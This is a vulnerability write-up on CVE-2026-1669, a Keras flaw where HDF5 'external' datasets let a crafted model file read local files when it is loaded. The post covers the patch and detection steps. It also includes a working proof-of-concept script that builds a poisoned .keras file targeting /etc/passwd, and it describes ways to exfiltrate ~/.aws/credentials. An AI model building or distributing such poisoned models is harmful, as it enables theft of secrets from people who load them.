
CVE-2026-1669
CVSS 7.1 · EPSS 0.04%

Model Poisoning: Turning Keras Weights into Weaponized File Readers

Amit Schendel
Senior Security Researcher

Feb 18, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.

A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.

The Trojan Horse in the Supply Chain

We live in an era where 'pip install' and 'model.load()' are typed with reckless abandon. Developers treat machine learning models like static assets—big bags of floating-point numbers that magically detect cats or translate French. But under the hood, the standard formats for these models are complex, structured filesystems. Keras, the high-level API that powers a massive chunk of the deep learning ecosystem, relies heavily on HDF5 (Hierarchical Data Format version 5) for saving and loading these weights.

Here is the problem: HDF5 isn't just a container for numbers; it's a feature-rich legacy format that supports everything from compression to complex object linking. One of those features is 'External Storage'—a mechanism designed to keep file sizes down by pointing a dataset to an external file on the disk rather than embedding the data.
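
To see the feature in its intended, benign form, here is a minimal h5py sketch (the file names weights.bin and container.h5 are illustrative): the raw floats live in a separate binary file, and the HDF5 container stores only a pointer to them.

import numpy as np
import h5py

# Legitimate use: keep bulky raw data outside the HDF5 container.
raw = np.arange(16, dtype=np.float32)
raw.tofile('weights.bin')  # 64 bytes of raw float32 data

with h5py.File('container.h5', 'w') as f:
    # The dataset stores only a pointer: (filename, offset, size in bytes).
    f.create_dataset(
        'kernel',
        shape=raw.shape,
        dtype=raw.dtype,
        external=[('weights.bin', 0, raw.nbytes)],
    )

with h5py.File('container.h5', 'r') as f:
    # Reading the dataset transparently pulls the bytes from weights.bin.
    print(f['kernel'][:])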

CVE-2026-1669 is the classic story of a feature becoming a bug. By failing to validate these external links, Keras turned every load_model() call into a potential arbitrary file read primitive. If you are a security researcher, this is the kind of logic flaw you dream about: no memory corruption, no race conditions, just a polite request to the operating system to hand over its secrets.

The Mechanism: HDF5's Symlink from Hell

To understand this exploit, you have to understand how Keras uses h5py. When you save a model to .keras or .h5, Keras maps the neural network layers to HDF5 groups and the weights (kernels and biases) to HDF5 datasets. A dataset is usually a multidimensional array of numbers stored contiguously in the file.

However, the HDF5 specification allows a dataset to be 'contiguous', 'chunked', or 'external'. When a dataset is marked as external, the HDF5 header effectively says: "The data for this array isn't here. Go look in /etc/passwd at offset 0."

> [!NOTE]
> This is not a bug in HDF5 or h5py. It is a documented feature for scientists who want to reference massive raw data files without duplicating them. The vulnerability lies entirely in Keras blindly assuming that every dataset it encounters is internal and safe.

The Keras loading logic iterates through the HDF5 structure, sees a dataset, and asks h5py to read it into a NumPy array. h5py, being a dutiful library, sees the external flag, resolves the path, opens the file, and reads the bytes. Keras then wraps those bytes in a Tensor and hands them to your GPU. Congratulations, your SSH private key is now a bias vector in a Dense layer.
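
To make that concrete, here is a minimal read-side sketch against the suspicious_model.keras file crafted later in this post (a single uint8 dataset named 'vars' backed by external storage). Exact behavior varies with the HDF5 build and the size of the target file, but the point stands: h5py follows the pointer without complaint.

import h5py

with h5py.File('suspicious_model.keras', 'r') as f:
    dataset = f['vars']        # looks like an ordinary weight tensor
    print(dataset.external)    # non-None: list of (filename, offset, size) tuples
    data = dataset[...]        # h5py resolves the pointer and reads the target file
    print(bytes(data)[:120])   # the 'weights' are the raw bytes of /etc/passwd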

The Code: Examining the Blind Spot

Let's look at the vulnerable code path in keras/src/saving/saving_lib.py (pre-3.13.2). The loader would recursively walk through the HDF5 groups. When it found a dataset, it simply accessed it. In Python's h5py, accessing a dataset behaves like reading an array—it triggers the I/O immediately.

The fix, introduced in commit 8a37f9d, is a masterclass in 'better late than never.' The maintainers added a centralized verification step, _verify_dataset, which explicitly checks the .external attribute of the HDF5 dataset object before allowing any data to be read.

Here is the heart of the patch:

# patched version of _verify_dataset
def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(f"Expected Dataset, got {type(dataset)}")
    
    # THE FIX: Explicitly ban external links
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    return dataset

They also removed the items() and values() methods from the H5WeightsStore class, forcing all access through __getitem__, which now includes this mandatory security check. It is a robust fix because it kills the vulnerability at the data-access layer rather than trying to sanitize paths or restrict filenames.
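
Conceptually, the access pattern now looks like the sketch below. This is not the literal Keras source, just the shape of the control flow it describes: every lookup is funneled through __getitem__, and __getitem__ refuses external datasets.

import h5py

class H5WeightsStore:
    """Sketch of a weights store whose only read path is __getitem__."""

    def __init__(self, group):
        self._group = group  # an open h5py.Group

    def __getitem__(self, name):
        dataset = self._group[name]
        return self._verify_dataset(dataset)  # every access is checked

    def _verify_dataset(self, dataset):
        if not isinstance(dataset, h5py.Dataset):
            raise ValueError(f"Expected Dataset, got {type(dataset)}")
        if dataset.external:  # reject external storage outright
            raise ValueError(
                "Not allowed: H5 file Dataset with external links: "
                f"{dataset.external}"
            )
        return dataset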

The Exploit: Crafting the Poisoned Model

Exploiting this is trivially easy and requires no advanced binary exploitation skills. We just need to create a valid HDF5 file that defines a dataset pointing to a sensitive file. We can do this using standard Python libraries.

Imagine an attacker uploads a model to a public repository claiming to be the new state-of-the-art 'LLM-finetuner'. Here is how they build the trap:

import h5py
import numpy as np
 
# Target file we want to steal
target_file = '/etc/passwd'
# Or on Windows: 'C:\\Windows\\win.ini'
 
print(f"[*] Crafting malicious model pointing to {target_file}...")
 
with h5py.File('suspicious_model.keras', 'w') as f:
    # Create a dummy group structure Keras expects
    layer_group = f.create_group('layers')
    dense_group = layer_group.create_group('dense_1')
    
    # Define the 'external' list: (filename, offset, size)
    # h5py.h5f.UNLIMITED allows reading the whole file
    external_link = [(target_file, 0, h5py.h5f.UNLIMITED)]
    
    # Create the dataset. 
    # The shape must roughly match the file size or be large enough.
    # We use uint8 to read raw bytes.
    f.create_dataset('vars', shape=(2048,), dtype='uint8',
                     external=external_link)
 
print("[+] Malicious payload created.")

When the victim runs keras.models.load_model('suspicious_model.keras'), Keras will eventually throw an error because the file content (text) won't look like valid float32 weights for a neural network. However, by the time the error is thrown, the read has likely already occurred; a clever attacker can also map the file to a byte or string tensor that Keras might accept for certain metadata fields.
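
The victim-side trigger is nothing more exotic than the ordinary loading call; a minimal sketch, wrapped only to show that a failed load does not mean the read never happened:

import keras

try:
    model = keras.models.load_model('suspicious_model.keras')
except Exception as exc:
    # Deserialization may fail once the stolen bytes refuse to parse as weights,
    # but any external reads triggered during loading have already happened.
    print(f'Load failed: {exc}')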

The Impact: From Read to Exfiltration

So the model reads /etc/passwd. How does the attacker get it? This is where the context matters. In a local attack, the data is just in memory. But consider a Machine Learning-as-a-Service (MLaaS) environment or a CI/CD pipeline.

  1. Inference Leaks: If the attacker can map the sensitive file to a weight used in the output layer, querying the model could return the file contents as the prediction result.
  2. Error Messages: Sometimes, validation errors print the 'invalid' values. If the value is the content of a configuration file, it appears in the logs.
  3. Side Channels: If the file size influences the model structure, it might crash the process in a measurable way, allowing an oracle attack to guess file existence.

The most dangerous scenario is a system that allows users to upload a model for fine-tuning or evaluation. The backend loads the model (reading the server's local secrets like AWS credentials from ~/.aws/credentials), and if the attacker can trigger a save or export of the model later, those 'external' bytes might be saved as 'internal' bytes in the new file, which the attacker then downloads.

Remediation: Patching the Hole

The remediation is straightforward: Update Keras to version 3.13.2 immediately. This version contains the dataset.external check that neutralizes the attack vector entirely.

If you cannot update (perhaps you are stuck on a legacy stack), you must treat all .keras and .h5 files as untrusted binaries. Do not load them outside of a sandboxed environment. You can also manually inspect files before loading using the h5dump command-line utility:

# Check for external storage configuration
h5dump -p -H malicious.keras | grep "EXTERNAL_FILE"
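
If h5dump is not available in your pipeline, the same inspection can be scripted with h5py; here is a minimal sketch (the helper name find_external_datasets is illustrative):

import h5py

def find_external_datasets(path):
    """Return (dataset_name, external_tuples) for every externally stored dataset."""
    flagged = []
    with h5py.File(path, 'r') as f:
        def visit(name, obj):
            if isinstance(obj, h5py.Dataset) and obj.external:
                flagged.append((name, obj.external))
        f.visititems(visit)
    return flagged

hits = find_external_datasets('suspicious_model.keras')
if hits:
    print('[!] External storage found, do not load:', hits)
else:
    print('[+] No external datasets detected.')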

If that grep, or the script above, turns up anything, delete the file and burn the hard drive (metaphorically speaking). This vulnerability serves as a stark reminder that 'data' formats are often code in disguise.

Official Patches

Keras Pull Request #22057: Fix external dataset check


Technical Appendix

CVSS Score: 7.1 / 10
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS Probability: 0.04% (top 88% most exploited)

Affected Systems

  • Keras 3.0.0
  • Keras 3.1.0
  • Keras 3.13.1
  • Any Python application using Keras to load untrusted models

Affected Versions Detail

Product: Keras (Google)
Affected Versions: >= 3.0.0, < 3.13.2
Fixed Version: 3.13.2

CWE ID: CWE-73 (External Control of File Name or Path)
CVSS v4.0: 7.1 (High)
Attack Vector: Network / Local
EPSS Score: 0.00039
Exploit Maturity: Proof of Concept (PoC)
Affected Component: keras.src.saving.saving_lib

MITRE ATT&CK Mapping

  • T1005: Data from Local System (Collection)
  • T1552: Unsecured Credentials (Credential Access)

CWE-73: External Control of File Name or Path
The software allows user input to control or influence paths or file names that are used in filesystem operations.

Known Exploits & Detection

Giuseppe Massaro: Original PoC demonstrating local file inclusion via HDF5 external storage.

Vulnerability Timeline

  • 2026-01-28: Patch merged into Keras main branch
  • 2026-02-11: CVE published
  • 2026-02-17: PoC confirmed by researcher

References & Sources

  • [1] NVD - CVE-2026-1669
  • [2] GitHub Security Advisory

Attack Flow Diagram
